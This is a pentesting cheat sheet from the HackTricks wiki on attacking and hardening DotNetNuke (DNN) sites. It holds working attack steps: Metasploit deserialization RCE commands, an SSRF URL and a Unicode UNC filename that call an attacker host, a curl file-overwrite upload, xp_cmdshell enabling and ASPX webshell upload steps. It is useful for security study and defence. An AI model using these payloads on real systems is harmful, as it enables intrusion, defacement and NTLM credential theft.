dotnetnuke-dnn.md (9840B)
1 --- 2 title: "DotNetNuke (DNN)" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # DotNetNuke (DNN) 14 15 ## DotNetNuke (DNN) 16 17 If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work. 18 19 --- 20 ## Version & Environment Enumeration 21 22 * Check the *X-DNN* HTTP response header – it usually discloses the exact platform version. 23 * `GET /Documentation/License.txt` is still useful for rough version fingerprinting on many deployments. 24 * The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs). 25 * `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users. 26 * Probe `Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/` early: the default CKEditor provider is the attack surface behind the 2025 anonymous upload and NTLM-leak bugs. 27 * Typical cookies you will see on a live instance: 28 * `.DOTNETNUKE` – ASP.NET forms authentication ticket. 29 * `DNNPersonalization` – contains XML/serialized user profile data (old versions – see RCE below). 30 31 --- 32 ## Unauthenticated Exploitation 33 34 ### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups) 35 *Affected versions ≤ 9.3.0-RC* 36 37 `DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution. For gadget details and payload structure, check [this other page about .NET deserialization gadgets](/hacktricks/pentesting-web/deserialization/basic-net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json-net).<sup>[[1]](#references)</sup> 38 39 ```text 40 msf> use exploit/windows/http/dnn_cookie_deserialization_rce 41 msf> set RHOSTS <target> 42 msf> set LHOST <attacker_ip> 43 msf> run 44 ``` 45 46 The module automatically chooses the right path for patched but still vulnerable versions (`CVE-2018-15811`, `CVE-2018-15812`, `CVE-2018-18325`, `CVE-2018-18326`). Useful operator notes:<sup>[[1]](#references)</sup> 47 48 * A reliable trigger is any path that reaches the built-in DNN 404 page; the Metasploit module defaults to `/__`. 49 * In `9.1.1`–`9.2.1`, **Verified Registration** leaks enough known plaintext (`{portalId}-{userId}` from the registration flow) to recover the weak DES-protected cookie material and re-exploit the bug. 50 * In `9.2.0+`, exploitation also needs a valid `.DOTNETNUKE` session cookie. 51 * In `9.2.2`–`9.3.0-RC`, `userId` became a GUID, so collecting several verification codes makes the offline key search practical again. 52 * If self-registration is enabled, these "low-priv only" versions are still realistic Internet-facing targets. 53 54 ### 2. Server-Side Request Forgery (CVE-2025-32372) 55 *Affected versions < 9.13.8 – Patch released April 2025* 56 57 A bypass of the older `DnnImageHandler` / remote-content validation logic enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF).<sup>[[3]](#references)</sup> Practical impacts: 58 59 * Internal port scan / metadata service discovery in cloud deployments. 60 * Reach hosts otherwise firewalled from the Internet. 61 * Revisit older SSRF bug classes (`CVE-2017-0929`, `CVE-2021-40186`) during patch diffing, because the same image-fetching feature has been fixed multiple times. 62 63 The 2025 bypass was caused by **prefix-based alias validation** (`portal.example.com` incorrectly matching `portal.example.com.attacker.tld`) instead of exact host/path matching. 64 65 Proof-of-concept (replace `TARGET`, `VALID-ALIAS`, and `ATTACKER`): 66 ```text 67 https://TARGET/API/RemoteContentProxy?url=http://VALID-ALIAS.ATTACKER/poc 68 ``` 69 The request is triggered in the background; use Burp Collaborator / Interactsh or a simple HTTP listener and watch for callbacks rather than expecting a full response body. 70 71 ### 3. Anonymous CKE Upload / Content Overwrite (CVE-2025-64095) 72 *Affected versions < 10.1.1* 73 74 The default HTML editor provider exposes `Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx` to anonymous users. By sending `overrideFiles=1`, an attacker can replace existing portal assets without logging in.<sup>[[4]](#references)</sup> 75 76 ```bash 77 curl -sk -X POST \ 78 'https://TARGET/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx' \ 79 -F 'file=@logo.svg;type=image/svg+xml' \ 80 -F 'storageFolderID=1' \ 81 -F 'portalID=0' \ 82 -F 'overrideFiles=1' \ 83 -F 'mode=Default' 84 ``` 85 86 In the default configuration this is usually an **overwrite/defacement/stored-XSS** primitive rather than instant ASPX RCE: uploads commonly land in `Portals/_default/`, and public PoCs note that the default editor path typically accepts images / SVGs instead of arbitrary server-executable extensions. 87 88 ### 4. NTLM Hash Exposure via Unicode-normalized UNC filename (CVE-2025-52488) 89 *Affected versions 6.0.0 – 9.x (< 10.0.1)* 90 91 The same CKE upload surface can be abused with a filename that passes initial validation but **normalizes into a UNC path** later in the workflow.<sup>[[5]](#references)</sup> Public writeups highlight fullwidth Unicode characters such as `U+FF3C` and `U+FF0E`, which become backslashes and dots late enough to re-introduce a path like `\\attacker\share.jpg`. 92 93 ```text 94 filename="%EF%BC%BC%EF%BC%BCattacker%EF%BC%8Ecom%EF%BC%BCshare.jpg" 95 # => \\attacker.com\share.jpg after normalization 96 ``` 97 98 That forces the Windows host to attempt outbound SMB authentication and leak NTLM material. Run **Responder** / **ntlmrelayx** and look for SMB callbacks instead of HTTP ones. 99 100 ### 5. IP Filter Bypass (CVE-2025-52487) 101 If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed in reverse-proxy setups by manipulating forwarding headers such as `X-Forwarded-For`.<sup>[[6]](#references)</sup> Test the protected login flow through the same proxy path normal users hit, not only by talking directly to the origin. 102 103 --- 104 ## Post-Authentication to RCE 105 106 ### Via SQL console 107 Under **`Settings → SQL`** a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands: 108 109 ```sql 110 EXEC sp_configure 'show advanced options', 1; 111 RECONFIGURE; 112 EXEC sp_configure 'xp_cmdshell', 1; 113 RECONFIGURE; 114 GO 115 xp_cmdshell 'whoami'; 116 ``` 117 118 ### Via ASPX webshell upload 119 1. Go to **`Settings → Security → More → More Security Settings`**. 120 2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**. 121 3. Browse to **`/admin/file-management`** and upload `shell.aspx`. 122 4. Trigger it at **`/Portals/0/shell.aspx`**. 123 124 Before **9.13.2**, DNN mostly validated uploads by **extension** and not by actual file contents. That means renamed PE files (for example a file beginning with `MZ` but named `payload.jpg`) could still be staged in the portal file store. By itself this is not IIS RCE, but it is a useful primitive for later overwrite / execution chains. 125 126 --- 127 ## Privilege Escalation on Windows 128 Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage: 129 130 * **PrintSpoofer** / **RoguePotato** / **GodPotato** when `SeImpersonatePrivilege` is present. 131 * Token/service-account escape primitives such as **SharpEfsPotato** depending on OS build and patch level. 132 133 --- 134 ## Hardening Recommendations (Blue Team) 135 136 * **Upgrade** to at least **10.1.1**. Staying on **9.13.8/9.13.9** only closes the older SSRF class and still leaves later HTML-editor attack surface unaddressed.<sup>[[2]](#references)</sup> 137 * If you must stay on 9.x, prefer the latest **9.13.x** build and put the CKE browser/upload endpoints behind upstream access controls. 138 * Remove residual **`InstallWizard.aspx*`** files after installation. 139 * Disable outbound SMB (ports **445/139**) egress. 140 * Do not rely on DNN's login IP filters unless the edge proxy overwrites forwarding headers. 141 * Block access to `/API/RemoteContentProxy` if unused. 142 * Consider denying direct Internet access to `/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/` when the editor is not needed externally. 143 144 ## References 145 146 - [1] [Rapid7 Metasploit module docs: `dnn_cookie_deserialization_rce`](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md) 147 - [2] [DNN Platform `v10.1.1` release notes](https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v10.1.1) 148 - [3] [DNN Security Advisory GHSA-3f7v-qx94-666m – Server-Side Request Forgery (SSRF) in DotNetNuke.Core (CVE-2025-32372)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-3f7v-qx94-666m) 149 - [4] [DNN Security Advisory GHSA-3m8r-w7xg-jqvw – Insufficient Access Control: Image Upload allows Site Content Overwrite (CVE-2025-64095)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-3m8r-w7xg-jqvw) 150 - [5] [DNN Security Advisory GHSA-mgfv-2362-jq96 – NTLM hash leakage via SMB share interaction with malicious user input (CVE-2025-52488)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96) 151 - [6] [DNN Security Advisory GHSA-fjhg-3mrh-mm7h – Possible bypass of IP Filters (CVE-2025-52487)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-fjhg-3mrh-mm7h)